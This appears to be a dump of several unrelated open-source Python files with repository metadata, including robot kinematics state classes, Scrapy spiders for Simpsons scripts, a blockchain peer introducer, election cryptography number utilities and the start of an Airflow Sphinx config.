#flags=GraphicsPipe.BFRefuseWindow)
# self.window = win2#self.win #dr.getWindow()
self.win2 = win2
# self.win2.setupCopyTexture()
# Adopted from : https://www.panda3d.org/forums/viewtopic.php?t=3880
#
# Set Multiple Cameras
self.cameraList = []
for i in range(4*4):
print 'Create camera#', i
self.cameraList.append( self.customCamera( str(i) ) )
# Disable default camera
# dr = self.camNode.getDisplayRegion(0)
# dr.setActive(0)
#
# Set Display Regions (4x4)
dr_list = self.customDisplayRegion(4,4)
#
# Setup each camera
for i in range(len(dr_list)):
dr_list[i].setCamera( self.cameraList[i] )
#
# Set buffered Queues (to hold rendered images and their positions)
# each queue element will be an RGB image of size 240x320x3
self.q_imStack = Queue.Queue()
self.q_labelStack = Queue.Queue()
print self.tcolor.OKGREEN, '\n##########\n'+'Panda3d Renderer Initialization Complete'+'\n##########\n', self.tcolor.ENDC
| 33.884699 | 129 | 0.587048 |
01530d6788eec8bc5f7a3f5abd8ef0794178a80e | 14,415 | py | Python | src/squad/motion/states.py | douglasdaly/spot-robot | 7a4fdd7eb5fe5fc2d31180ed6b9f7ea21647bea2 | [
"MIT"
] | null | null | null | src/squad/motion/states.py | douglasdaly/spot-robot | 7a4fdd7eb5fe5fc2d31180ed6b9f7ea21647bea2 | [
"MIT"
] | null | null | null | src/squad/motion/states.py | douglasdaly/spot-robot | 7a4fdd7eb5fe5fc2d31180ed6b9f7ea21647bea2 | [
"MIT"
] | null | null | null | from collections.abc import Sequence
from datetime import datetime
from typing import (
Any,
Dict,
Iterable,
Iterator,
List,
Optional,
Tuple,
TypeVar,
Union,
)
from squad.constants import Leg
from squad.exceptions import StateError
from squad.kinematics.base import BodyParameters
from squad.kinematics.forward import foot_xyz
from squad.kinematics.inverse import leg_thetas
from .base import BaseState
L = TypeVar("L", bound="LegStates")
T_LegState = TypeVar("T_LegState", bound="LegState")
class LegState(BaseState):
"""
Leg state data for one leg of the robot.
"""
__slots__ = (
"_leg",
"_x",
"_y",
"_z",
"_hip_theta",
"_femur_theta",
"_leg_theta",
)
def __init__(
self,
leg: Leg,
x: float,
y: float,
z: float,
hip_theta: float,
femur_theta: float,
leg_theta: float,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self._leg = leg
self._x = x
self._y = y
self._z = z
self._hip_theta = hip_theta
self._femur_theta = femur_theta
self._leg_theta = leg_theta
@property
def leg(self) -> Leg:
"""Leg: The leg with this state object."""
return self._leg
@property
def x(self) -> float:
"""float: The current X-coordinate of the foot."""
return self._x
@property
def y(self) -> float:
"""float: The current Y-coordinate of the foot."""
return self._y
@property
def z(self) -> float:
"""float: The current Z-coordinate of the foot."""
return self._z
@property
def hip_theta(self) -> float:
"""float: The current hip angle for this leg."""
return self._hip_theta
@property
def femur_theta(self) -> float:
"""float: The current femur angle for this leg."""
return self._femur_theta
@property
def leg_theta(self) -> float:
"""float: The current leg angle for this leg."""
return self._leg_theta
def __str_args__(self) -> Tuple[Iterable[Any], Dict[str, Any]]:
s_args, s_kws = super().__str_args__()
s_kws["x"] = self._x
s_kws["y"] = self._y
s_kws["z"] = self._z
s_kws["hip_theta"] = self._hip_theta
s_kws["femur_theta"] = self._femur_theta
s_kws["leg_theta"] = self._leg_theta
return s_args, s_kws
def __repr_args__(self) -> Tuple[Iterable[Any], Dict[str, Any]]:
r_args, r_kws = super().__repr_args__()
r_kws["x"] = self._x
r_kws["y"] = self._y
r_kws["z"] = self._z
r_kws["hip_theta"] = self._hip_theta
r_kws["femur_theta"] = self._femur_theta
r_kws["leg_theta"] = self._leg_theta
return r_args, r_kws
def __hash_params__(self) -> Tuple[Any, ...]:
return super().__hash_params__() + (self.leg,)
def update_position(
self,
x: float,
y: float,
z: float,
**kwargs: Any,
) -> None:
"""Updates the leg's state for the given foot position.
Parameters
----------
x : float
The new X-coordinate of the foot to set.
y : float
The new Y-coordinate of the foot to set.
z : float
The new Z-coordinate of the foot to set.
**kwargs : optional
Any additional parameters to pass to the :obj:`leg_thetas`
function.
"""
self._x = x
self._y = y
self._z = z
self._hip_theta, self._femur_theta, self._leg_theta = leg_thetas(
self._leg,
x,
y,
z,
**kwargs,
)
self._timestamp = datetime.now()
def update_orientation(
self,
hip_theta: float,
femur_theta: float,
leg_theta: float,
**kwargs: Any,
) -> None:
"""Updates the leg's state for the given servo angles.
Parameters
----------
hip_theta : float
The new Hip-angle of the leg to set.
femur_theta : float
The new Femur-angle of the leg to set.
leg_theta : float
The new Leg-angle of the leg to set.
**kwargs : optional
Any additional parameters to pass to the :obj:`foot_xyz`
function.
"""
self._hip_theta = hip_theta
self._femur_theta = femur_theta
self._leg_theta = leg_theta
self._x, self._y, self._z = foot_xyz(
self._leg,
hip_theta,
femur_theta,
leg_theta,
**kwargs,
)
def distance(self, other: "LegState") -> float:
super().distance(other)
return (
((self._x - other._x) ** 2)
+ ((self._y - other._y) ** 2)
+ ((self._z - other._z) ** 2)
) ** 0.5
@classmethod
def from_position(
cls,
leg: Leg,
x: float,
y: float,
z: float,
*,
timestamp: Optional[datetime] = None,
**kwargs: Any,
) -> "LegState":
"""Creates a new LegState from the given foot position.
Parameters
----------
leg : Leg
The leg to create the new state object for.
x : float
The X-coordinate of the foot to create the new state for.
y : float
The Y-coordinate of the foot to create the new state for.
z : float
The Z-coordinate of the foot to create the new state for.
timestamp : datetime, optional
The timestamp to use for the new state, if any.
**kwargs : optional
Additional keyword arguments to pass to the
:obj:`leg_thetas` function.
Returns
-------
LegState
The leg state requested, initialized from the given foot
position.
"""
t_hip, t_femur, t_leg = leg_thetas(leg, x, y, z, **kwargs)
return cls(leg, x, y, z, t_hip, t_femur, t_leg, timestamp=timestamp)
@classmethod
def from_thetas(
cls,
leg: Leg,
hip_theta: float,
femur_theta: float,
leg_theta: float,
*,
timestamp: Optional[datetime] = None,
**kwargs: Any,
) -> "LegState":
"""Creates a new LegState from the given servo angles.
Parameters
----------
leg : Leg
The leg to create the new state object for.
hip_theta : float
The Hip-angle of the leg to create the new state for.
femur_theta : float
The Femur-angle of the leg to create the new state for.
leg_theta : float
The Leg-angle of the leg to create the new state for.
timestamp : datetime, optional
The timestamp to use for the new state, if any.
**kwargs : optional
Additional keyword arguments to pass to the :obj:`foot_xyz`
function.
Returns
-------
LegState
The leg state requested, initialized from the given leg
servo angles.
"""
x, y, z = foot_xyz(leg, hip_theta, femur_theta, leg_theta, **kwargs)
return cls(
leg,
x,
y,
z,
hip_theta,
femur_theta,
leg_theta,
timestamp=timestamp,
)
class LegStates(Sequence[T_LegState], BaseState):
"""
Composite state/wrapper for holding :obj:`LegState` objects.
"""
__slots__ = ("_legs",)
def __init__(self, *leg_states: T_LegState, **kwargs: Any) -> None:
self._legs: List[T_LegState] = sorted(leg_states, key=lambda x: x.leg)
if len(self._legs) != 4:
raise StateError(
"Invalid number of leg states given (requires 4), got:"
f" {len(self._legs)}"
)
elif not all(x.leg == (i + 1) for i, x in enumerate(self._legs)):
raise StateError("Not all legs represented in leg states given")
if "timestamp" not in kwargs or kwargs["timestamp"] is None:
kwargs["timestamp"] = max(x.timestamp for x in self._legs)
super().__init__(**kwargs)
@property
def fl(self) -> T_LegState:
"""LegState: State of the front-left leg."""
return self._legs[Leg.FL - 1]
@property
def fr(self) -> T_LegState:
"""LegState: State of the front-right leg."""
return self._legs[Leg.FR - 1]
@property
def bl(self) -> T_LegState:
"""LegState: State of the back-left leg."""
return self._legs[Leg.BL - 1]
@property
def br(self) -> T_LegState:
"""LegState: State of the back-right leg."""
return self._legs[Leg.BR - 1]
def __str_args__(self) -> Tuple[List[Any], Dict[str, Any]]:
s_args, s_kws = super().__str_args__()
_ = (s_args.append(x) for x in self._legs)
return s_args, s_kws
def __repr_args__(self) -> Tuple[List[Any], Dict[str, Any]]:
r_args, r_kws = super().__repr_args__()
_ = (r_args.append(x) for x in self._legs)
return r_args, r_kws
def __iter__(self) -> Iterator[T_LegState]:
return iter(self._legs)
def __len__(self) -> int:
return len(self._legs)
def __getitem__(self, leg: Union[int, Leg]) -> T_LegState:
if isinstance(leg, Leg):
l_idx = leg.value - 1
else:
l_idx = leg
return self._legs[l_idx]
def __getstate__(self) -> Dict[str, Any]:
state = super().__getstate__()
state["legs"] = [x.__getstate__() for x in self._legs]
return state
def __setstate__(self, state: Dict[str, Any]) -> None:
legs: List[Dict[str, Any]] = state.pop("legs")
state["legs"] = [LegState.from_dict(x) for x in legs]
return super().__setstate__(state)
def distance(self, other: "LegStates") -> float:
super().distance(other)
ret = 0.0
for i, v in enumerate(self._legs):
ret += v.distance(other._legs[i])
return ret / len(self._legs)
class RobotState(BaseState):
"""
Overall kinematic state data storage for the robot.
"""
__slots__ = (
"_x",
"_y",
"_z",
"_roll",
"_pitch",
"_yaw",
"_leg_states",
"_body",
)
def __init__(
self,
x: float,
y: float,
z: float,
roll: float,
pitch: float,
yaw: float,
legs: Sequence[LegState],
*,
body_params: Optional[BodyParameters] = None,
**kwargs: Any,
) -> None:
if body_params is None:
self._body = BodyParameters(**kwargs)
else:
self._body = body_params
super().__init__(**kwargs)
self._x = x
self._y = y
self._z = z
self._roll = roll
self._pitch = pitch
self._yaw = yaw
self._leg_states = LegStates(*legs)
@property
def x(self) -> float:
"""float: The current X-coordinate of the body."""
return self._x
@property
def y(self) -> float:
"""float: The current Y-coordinate of the body."""
return self._y
@property
def z(self) -> float:
"""float: The current Z-coordinate of the body."""
return self._z
@property
def roll(self) -> float:
"""float: The current Roll-angle of the body."""
return self._roll
@property
def pitch(self) -> float:
"""float: The current Pitch-angle of the body."""
return self._pitch
@property
def yaw(self) -> float:
"""float: The current Yaw-angle of the body."""
return self._yaw
@property
def legs(self) -> LegStates[LegState]:
"""LegStates[LegState]: The state of each leg."""
return self._leg_states
@property
def body(self) -> BodyParameters:
"""BodyParameters: The related body parameters for this state."""
return self._body
def __str_args__(self) -> Tuple[List[Any], Dict[str, Any]]:
s_args, s_kws = super().__str_args__()
s_kws["x"] = self._x
s_kws["y"] = self._y
s_kws["z"] = self._z
s_kws["roll"] = self._roll
s_kws["pitch"] = self._pitch
s_kws["yaw"] = self._yaw
return s_args, s_kws
def __repr_args__(self) -> Tuple[List[Any], Dict[str, Any]]:
r_args, r_kws = super().__repr_args__()
r_args.append(self._x)
r_args.append(self._y)
r_args.append(self._z)
r_args.append(self._roll)
r_args.append(self._pitch)
r_args.append(self._yaw)
r_args.append(tuple(self._leg_states))
return r_args, r_kws
def __getstate__(self) -> Dict[str, Any]:
state = super().__getstate__()
state["legs"] = self._leg_states.__getstate__()
state["body"] = self._body.__getstate__()
return state
def __setstate__(self, state: Dict[str, Any]) -> None:
state["legs"] = LegStates.from_dict(state.pop("legs"))
state["body"] = BodyParameters.from_dict(state.pop("body"))
return super().__setstate__(state)
def distance(self, other: "RobotState") -> float:
super().distance(other)
return (
((self._x - other._x) ** 2)
+ ((self._y - other._y) ** 2)
+ ((self._z - other._z) ** 2)
+ ((self._roll - other._roll) ** 2)
+ ((self._pitch - other._pitch) ** 2)
+ ((self._yaw - other._yaw) ** 2)
) ** 0.5
def pos_distance(self, other: "RobotState") -> float:
"""The distance between the positions of two states."""
super().distance(other)
return (
((self._x - other._x) ** 2)
+ ((self._y - other._y) ** 2)
+ ((self._z - other._z) ** 2)
) ** 0.5
def orn_distance(self, other: "RobotState") -> float:
"""The distance between the orientations of two states."""
super().distance(other)
return (
((self._roll - other._roll) ** 2)
+ ((self._pitch - other._pitch) ** 2)
+ ((self._yaw - other._yaw) ** 2)
) ** 0.5
| 28.375984 | 78 | 0.543115 |
b13c9cd265d19c188c6a4398a2402e4d49f4d785 | 3,215 | py | Python | crawler/crawler/spiders/scrape.py | VikParuchuri/simpsons-scripts | 4356fb90bedfa3e5fd1ea6c974e5d27842af06e6 | [
"Apache-2.0"
] | 15 | 2015-02-26T16:05:37.000Z | 2021-11-24T14:59:29.000Z | crawler/crawler/spiders/scrape.py | VikParuchuri/simpsons-scripts | 4356fb90bedfa3e5fd1ea6c974e5d27842af06e6 | [
"Apache-2.0"
] | null | null | null | crawler/crawler/spiders/scrape.py | VikParuchuri/simpsons-scripts | 4356fb90bedfa3e5fd1ea6c974e5d27842af06e6 | [
"Apache-2.0"
] | 4 | 2016-11-17T00:47:11.000Z | 2018-12-18T03:55:46.000Z | from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.selector import HtmlXPathSelector
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from scrapy.item import Item, Field
import re
snpp_base_url = "http://www.snpp.com/episodes.html"
ss_base_url = "http://www.springfieldspringfield.co.uk/episode_scripts.php"
sc_base_url = "http://www.simpsoncrazy.com/scripts"
class Script(Item):
url = Field()
episode_name = Field()
script = Field()
class SimpsonsSpider(CrawlSpider):
name = "snpp"
allowed_domains = ['www.snpp.com', 'snpp.com']
start_urls = [snpp_base_url]
rules = [Rule(SgmlLinkExtractor(allow=['/episodes/\w+.html']), 'parse_script')]
def fix_field_names(self, field_name):
field_name = re.sub(" ","_", field_name)
field_name = re.sub(":","", field_name)
return field_name
def parse_script(self, response):
x = HtmlXPathSelector(response)
script = Script()
script['url'] = response.url
script['episode_name'] = "".join(x.select("//h1/text()").extract())
script['script'] = " ".join(x.select("//pre/text()").extract())
return script
class SubtitleSpider(CrawlSpider):
name = "ss"
allowed_domains = ['www.springfieldspringfield.co.uk', 'springfieldspringfield.co.uk']
start_urls = [ss_base_url]
rules = [Rule(SgmlLinkExtractor(allow=['/view_episode_scripts.php\?tv-show=the-simpsons&episode=\w+']), 'parse_script')]
def fix_field_names(self, field_name):
field_name = re.sub(" ","_", field_name)
field_name = re.sub(":","", field_name)
return field_name
def parse_script(self, response):
x = HtmlXPathSelector(response)
script = Script()
script['url'] = response.url
script['episode_name'] = "".join(x.select("//h3/text()").extract())
script['script'] = "\n".join(x.select("//div[@class='episode_script']/text()").extract())
return script
class SimpsonsSpider2(CrawlSpider):
name = "sc"
allowed_domains = ['www.simpsoncrazy.com', 'simpsoncrazy.com']
start_urls = [sc_base_url]
rules = [Rule(SgmlLinkExtractor(allow=['/scripts/\w+']), 'parse_script')]
def fix_field_names(self, field_name):
field_name = re.sub(" ","_", field_name)
field_name = re.sub(":","", field_name)
return field_name
def parse_script(self, response):
x = HtmlXPathSelector(response)
script = Script()
script['url'] = response.url
script['episode_name'] = "".join(x.select("//h1/text()").extract())
all_text = x.select("//p/text()").extract()
for i in xrange(0,len(all_text)):
all_text[i] = re.sub("[\r\t\n]","",all_text[i]).strip()
counter = 0
new_text = []
while counter<len(all_text):
if(all_text[counter].upper()==all_text[counter]):
nt = all_text[counter].title() + ": " + all_text[counter+1]
new_text.append(nt)
counter=counter+2
else:
counter+=1
script['script'] = "\n".join(new_text)
return script | 34.202128 | 124 | 0.625194 |
e7602e4c24e3b25cf051c7a4c467a82bd8832171 | 1,909 | py | Python | tad/introducer/introducer_api.py | randywessels/tad-blockchain | 08a5f9565aa27f211350717d5e8cda14b46359e4 | [
"Apache-2.0"
] | 13 | 2021-07-20T15:21:54.000Z | 2022-02-09T04:32:56.000Z | tad/introducer/introducer_api.py | randywessels/tad-blockchain | 08a5f9565aa27f211350717d5e8cda14b46359e4 | [
"Apache-2.0"
] | 8 | 2021-07-21T17:22:59.000Z | 2021-09-18T23:01:59.000Z | tad/introducer/introducer_api.py | randywessels/tad-blockchain | 08a5f9565aa27f211350717d5e8cda14b46359e4 | [
"Apache-2.0"
] | 1 | 2021-07-20T18:14:02.000Z | 2021-07-20T18:14:02.000Z | from typing import Callable, Optional
from tad.introducer.introducer import Introducer
from tad.protocols.introducer_protocol import RequestPeersIntroducer, RespondPeersIntroducer
from tad.protocols.protocol_message_types import ProtocolMessageTypes
from tad.server.outbound_message import Message, make_msg
from tad.server.ws_connection import WSTadConnection
from tad.types.peer_info import TimestampedPeerInfo
from tad.util.api_decorators import api_request, peer_required
from tad.util.ints import uint64
class IntroducerAPI:
introducer: Introducer
def __init__(self, introducer) -> None:
self.introducer = introducer
def _set_state_changed_callback(self, callback: Callable):
pass
@peer_required
@api_request
async def request_peers_introducer(
self,
request: RequestPeersIntroducer,
peer: WSTadConnection,
) -> Optional[Message]:
max_peers = self.introducer.max_peers_to_send
if self.introducer.server is None or self.introducer.server.introducer_peers is None:
return None
rawpeers = self.introducer.server.introducer_peers.get_peers(
max_peers * 5, True, self.introducer.recent_peer_threshold
)
peers = []
for r_peer in rawpeers:
if r_peer.vetted <= 0:
continue
if r_peer.host == peer.peer_host and r_peer.port == peer.peer_server_port:
continue
peer_without_timestamp = TimestampedPeerInfo(
r_peer.host,
r_peer.port,
uint64(0),
)
peers.append(peer_without_timestamp)
if len(peers) >= max_peers:
break
self.introducer.log.info(f"Sending vetted {peers}")
msg = make_msg(ProtocolMessageTypes.respond_peers_introducer, RespondPeersIntroducer(peers))
return msg
| 33.491228 | 100 | 0.686223 |
674f791daecb50c0cbca8ae6a781e3ecfd36b7fa | 940 | py | Python | napari/utils/colormaps/colorbars.py | OKaluza/napari | 95a6afbbdb54a530b1eaca23037b8f98c7c8b064 | [
"BSD-3-Clause"
] | null | null | null | napari/utils/colormaps/colorbars.py | OKaluza/napari | 95a6afbbdb54a530b1eaca23037b8f98c7c8b064 | [
"BSD-3-Clause"
] | 4 | 2019-12-08T20:20:44.000Z | 2020-01-16T21:57:33.000Z | napari/utils/colormaps/colorbars.py | OKaluza/napari | 95a6afbbdb54a530b1eaca23037b8f98c7c8b064 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
def make_colorbar(cmap, size=(12, 28), horizontal=True):
"""Make a colorbar from a colormap.
Parameters
----------
cmap : vispy.color.Colormap
Colormap to create colorbar with.
size : 2-tuple
Shape of colorbar.
horizontal : bool
If True colobar is oriented horizontal, otherwise it is oriented
vertical.
Returns
----------
cbar : array
Array of colorbar.
"""
if horizontal:
input = np.linspace(0, 1, size[1])
bar = np.tile(np.expand_dims(input, 1), size[0]).transpose((1, 0))
else:
input = np.linspace(0, 1, size[0])
bar = np.tile(np.expand_dims(input, 1), size[1])
# cmap.__getitem__ returns a vispy.color.ColorArray
color_array = cmap[bar.ravel()]
# the ColorArray.RGBA method returns a normalized uint8 array
cbar = color_array.RGBA.reshape(bar.shape + (4,))
return cbar
| 26.111111 | 74 | 0.610638 |
0958928bcf350c427c35a34b86a28f5ff950beb3 | 3,009 | py | Python | pidtree_bcc/plugins/__init__.py | Yelp/pidtree-bcc | ea54752b873687a159091d509df3a4f9dcc4a994 | [
"BSD-3-Clause"
] | 20 | 2019-11-11T20:03:31.000Z | 2022-01-26T05:53:34.000Z | pidtree_bcc/plugins/__init__.py | Yelp/pidtree-bcc | ea54752b873687a159091d509df3a4f9dcc4a994 | [
"BSD-3-Clause"
] | 29 | 2019-10-21T21:38:33.000Z | 2022-03-09T14:44:41.000Z | pidtree_bcc/plugins/__init__.py | Yelp/pidtree-bcc | ea54752b873687a159091d509df3a4f9dcc4a994 | [
"BSD-3-Clause"
] | 4 | 2019-10-18T22:30:28.000Z | 2021-09-10T02:36:04.000Z | import logging
from typing import List
from pidtree_bcc.utils import find_subclass
class BasePlugin:
# Specifies which probes are compatible with the plugin
# Set to "*" to allow all probes
PROBE_SUPPORT = tuple()
def __init__(self, args: dict):
""" Constructor
:param dict args: plugin parameters
"""
self.validate_args(args)
def process(self, event: dict) -> dict:
""" Process the `event` dict, add in additional metadata and return a dict
:param dict event: event dictionary
:return: processed event dictionary
"""
raise NotImplementedError(
'Required method `process` has not been implemented by {}'.format(self.__name__),
)
def validate_args(self, args: dict):
""" Not required, override in inheriting class if you want to use this
:param dict args: plugin parameters
"""
pass
def load_plugins(plugin_dict: dict, calling_probe: str, extra_plugin_path: str = None) -> List[BasePlugin]:
""" Load and configure plugins
:param dict plugin_dict: where the keys are plugin names and the value
for each key is another dict of kwargs. Each key
must match a `.py` file in the plugin directory
:param str calling_probe: name of the calling probe for support validation
:param str extra_plugin_path: (optional) extra package path where to look for plugins
:return: list of loaded plugins
"""
plugins = []
for plugin_name, plugin_args in plugin_dict.items():
error = None
unload_on_init_exception = plugin_args.get(
'unload_on_init_exception', False,
)
if not plugin_args.get('enabled', True):
continue
plugin_packages = [
'{}.{}'.format(p, plugin_name)
for p in (__package__, extra_plugin_path) if p
]
try:
plugin_class = find_subclass(plugin_packages, BasePlugin)
if plugin_class.PROBE_SUPPORT != '*' and calling_probe not in plugin_class.PROBE_SUPPORT:
raise RuntimeError(
'{} is not among supported probes for plugin {}: {}'
.format(calling_probe, plugin_name, plugin_class.PROBE_SUPPORT),
)
plugins.append(plugin_class(plugin_args))
except ImportError as e:
error = RuntimeError(
'Could not import {}: {}'
.format(plugin_packages, e),
)
except StopIteration as e:
error = RuntimeError(
'Could not find plugin class in module {}: {}'
.format(plugin_packages, e),
)
except Exception as e:
error = e
finally:
if error:
if unload_on_init_exception:
logging.error(str(error))
else:
raise error
return plugins
| 34.586207 | 107 | 0.5889 |
120d14805c68a62a05c0a3b41f12afb888f8640d | 7,048 | py | Python | project/number.py | rainbowhuanguw/electionguard-SDK | 789def57a8aa6a43fa59af4e9e8bfb37ea6ebe1c | [
"MIT"
] | null | null | null | project/number.py | rainbowhuanguw/electionguard-SDK | 789def57a8aa6a43fa59af4e9e8bfb37ea6ebe1c | [
"MIT"
] | null | null | null | project/number.py | rainbowhuanguw/electionguard-SDK | 789def57a8aa6a43fa59af4e9e8bfb37ea6ebe1c | [
"MIT"
] | null | null | null | import random
import hashlib
from typing import (
Sequence
)
LARGE_PRIME = (int(('''104438888141315250669175271071662438257996424904738378038423348328
3953907971553643537729993126875883902173634017777416360502926082946377942955704498
5420976148418252467735806893983863204397479111608977315510749039672438834271329188
1374801626975452234350528589881677721176191239277291448552115552164104927344620757
8961939840619466145806859275053476560973295158703823395710210329314709715239251736
5523840808458360487786673189314183384224438910259118847234330847012077719019445932
8662497991739135056466263272370300796422984915475619689061525228653308964318490270
6926081744149289517418249153634178342075381874131646013444796894582106870531535803
6662545796026324531037414525697939055519015418561732513850474148403927535855819099
5015804625681054267836812127850996052095762473794291460031064660979266501285839738
1435755902851312071248102599442308951327039250818892493767423329663783709190716162
0235296692173009397831714158082331468230007669177892861540060422814237337064629052
4377485454312723950024587358201266366643058386277816736954760301634424272959224454
4608279405999759391099775667746401633668308698186721172238255007962658564443858927
6348504157753488390520266757856948263869301753031434500465754608438799417919463132
99322976993405829119''').replace('\n', '')))
SMALL_PRIME = pow(2, 256) - 189
def is_prime(num: int, k=5) -> bool:
"""
implements Miller-Rabin algorithm to test the primality of a number
:param num: a positive integer
:param k: the number of iterations, impacting accuracy; the larger the number, the higher accuracy will be.
set default as 5
:return: True if it's a prime, False otherwise
"""
# Corner cases
if num <= 1 or num == 4:
return False
if num <= 3:
return True
# Find r such that n = 2^d * r + 1 for some r >= 1
d = num - 1
while d % 2 == 0:
d //= 2
# Iterate given number of 'k' times
for i in range(k):
if not __miller_test(d, num):
return False
return True
def __miller_test(d: int, num: int) -> bool:
"""
find a odd number of d such that num - 1 = d * 2^r
:param d: an odd number that num - 1 = d * 2^r for r >= 1
:param num: the number needs to be check against
:return: True if num is prime, False if it's a composite
"""
# Pick a random number in [2..n-2]
# Corner cases make sure that n > 4
a = 2 + random.randint(1, num - 4)
# Compute a^d % n
x = pow(a, d, num)
if x == 1 or x == num - 1:
return True
# Keep squaring x while one of the following doesn't happen
# (i) d does not reach n-1
# (ii) (x^2) % n is not 1
# (iii) (x^2) % n is not n-1
while d != num - 1:
x = (x * x) % num
d *= 2
if x == 1:
return False
if x == num - 1:
return True
# Return composite
return False
def equals(a, b) -> bool:
"""
compares two values and check if their values are equal
@input: two integers a, b
@output: True if a, b have same values, False otherwise
"""
a, b = int(a), int(b)
return a == b
def is_divisor(a, b) -> bool:
"""
check if a is a divisor of b
:param a: a positive integer
:param b: b positive integer
:return: True if a is a divisor of b, False otherwise
"""
a, b = int(a), int(b)
return a % b == 0
def is_within_range(num, lower_bound: int, upper_bound: int) -> bool:
"""
check if a number is within a range bounded by upper and lower bound
:param num: target number needs to be checked against
:param lower_bound: exclusive lower bound
:param upper_bound: exclusive upper bound
:return: True if number is within this range, False otherwise
"""
num = int(num)
if upper_bound < lower_bound:
raise ValueError("bounds are incorrect")
return lower_bound < num < upper_bound
def is_within_set_zq(num) -> bool:
"""
check if a number is within set Zq,
:param num: target number needs to be checked against
:return: True if 0 <= num < q , False otherwise
"""
num = int(num)
# exclusive bounds, set lower bound to -1
return is_within_range(num, 0 - 1, SMALL_PRIME)
def is_within_set_zrp(num) -> bool:
"""
check if a number is within set Zrp, 0 < num < p and num ^ q mod p = 1
:param num: target number needs to be checked against
:return: True if 0 < num < p and num ^ q mod p = 1 , False otherwise
"""
num = int(num)
return is_within_range(num, 0, LARGE_PRIME) and equals(
pow(num, SMALL_PRIME, LARGE_PRIME), 1)
def mod_p(dividend) -> int:
"""
compute the modulus number by calculating dividend mod p
:param dividend: dividend, the number in front
:return: dividend mod p
"""
dividend = int(dividend)
return dividend % int(LARGE_PRIME)
def mod_q(dividend) -> int:
"""
:param dividend:
:return:
"""
dividend = int(dividend)
return dividend % int(SMALL_PRIME)
def multiply(*args, mod_num=1) -> int:
"""
:param mod_num:
:return:
"""
product = 1
for arg in args:
if arg >= mod_num:
arg = arg % mod_num
if product >= mod_num:
product = product % mod_num
product *= arg
return product % mod_num
def hash_elems(*a):
"""
main hash function using SHA-256, used in generating data, reference:
:param a: elements being fed into the hash function
:return: a hash number of 256 bit
"""
h = hashlib.sha256()
h.update("|".encode("utf-8"))
for x in a:
if not x:
# This case captures empty lists and None, nicely guaranteeing that we don't
# need to do a recursive call if the list is empty. So we need a string to
# feed in for both of these cases. "None" would be a Python-specific thing,
# so we'll go with the more JSON-ish "null".
hash_me = "null"
elif isinstance(x, str):
# strings are iterable, so it's important to handle them before the following check
hash_me = x
elif isinstance(x, Sequence):
# The simplest way to deal with lists, tuples, and such are to crunch them recursively.
hash_me = str(hash_elems(*x))
else:
hash_me = str(x)
h.update((hash_me + "|").encode("utf-8"))
# Note: the returned value will range from [1,Q), because zeros are bad
# for some of the nonces. (g^0 == 1, which would be an unhelpful thing
# to multiply something with, if you were trying to encrypt it.)
# Also, we don't need the checked version of int_to_q, because the
# modulo operation here guarantees that we're in bounds.
# return int_to_q_unchecked(
# 1 + (int.from_bytes(h.digest(), byteorder="big") % Q_MINUS_ONE)
# )
return int.from_bytes(h.digest(), byteorder="big") % (SMALL_PRIME - 1) | 30.912281 | 111 | 0.665011 |
17c6854f0b75f8002ede36a52da21ac22b3f0153 | 175 | py | Python | workbook/myFirstModule.py | hasanzainul10/cv-1 | 102b110170b5951a866ed0fc01284b4cd99bfc8b | [
"MIT"
] | null | null | null | workbook/myFirstModule.py | hasanzainul10/cv-1 | 102b110170b5951a866ed0fc01284b4cd99bfc8b | [
"MIT"
] | null | null | null | workbook/myFirstModule.py | hasanzainul10/cv-1 | 102b110170b5951a866ed0fc01284b4cd99bfc8b | [
"MIT"
] | null | null | null | ##myFirstModule
def greeting(name):
print(f"Hello {name}")
def goodbye(name):
print(f"Goodbye {name}")
person1 = {"age" : 12, "name": "john", "country":"malaysia"} | 17.5 | 60 | 0.622857 |
0c390ca5b391194b5823411a9b5960fbf96f549b | 18,465 | py | Python | docs/conf.py | ywf5566/airflow | e7872dddbf275729b2c42e2a4ff602a6df7d1536 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | docs/conf.py | ywf5566/airflow | e7872dddbf275729b2c42e2a4ff602a6df7d1536 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | docs/conf.py | ywf5566/airflow | e7872dddbf275729b2c42e2a4ff602a6df7d1536 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# flake8: noqa
# Disable Flake8 because of all the sphinx imports
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Airflow documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 9 20:50:01 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
"""Configuration of Airflow Docs"""
import os
import sys
from typing import Dict
import airflow
from airflow.configuration import default_config_yaml
try:
import sphinx_airflow_theme # pylint: disable=unused-import
airflow_theme_is_available = True
except ImportError:
airflow_theme_is_available = False
autodoc_mock_imports = [
'MySQLdb',
'adal',
'analytics',
'azure',
'azure.cosmos',
'azure.datalake',
'azure.mgmt',
'boto3',
'botocore',
'bson',
'cassandra',
'celery',
'cloudant',
'cryptography',
'cx_Oracle',
'datadog',
'distributed',
'docker',
'google',
'google_auth_httplib2',
'googleapiclient',
'grpc',
'hdfs',
'httplib2',
'jaydebeapi',
'jenkins',
'jira',
'kubernetes',
'mesos',
'msrestazure',
'pandas',
'pandas_gbq',
'paramiko',
'pinotdb',
'psycopg2',
'pydruid',
'pyhive',
'pyhive',
'pymongo',
'pymssql',
'pysftp',
'qds_sdk',
'redis',
'simple_salesforce',
'slackclient',
'smbclient',
'snowflake',
'sshtunnel',
'tenacity',
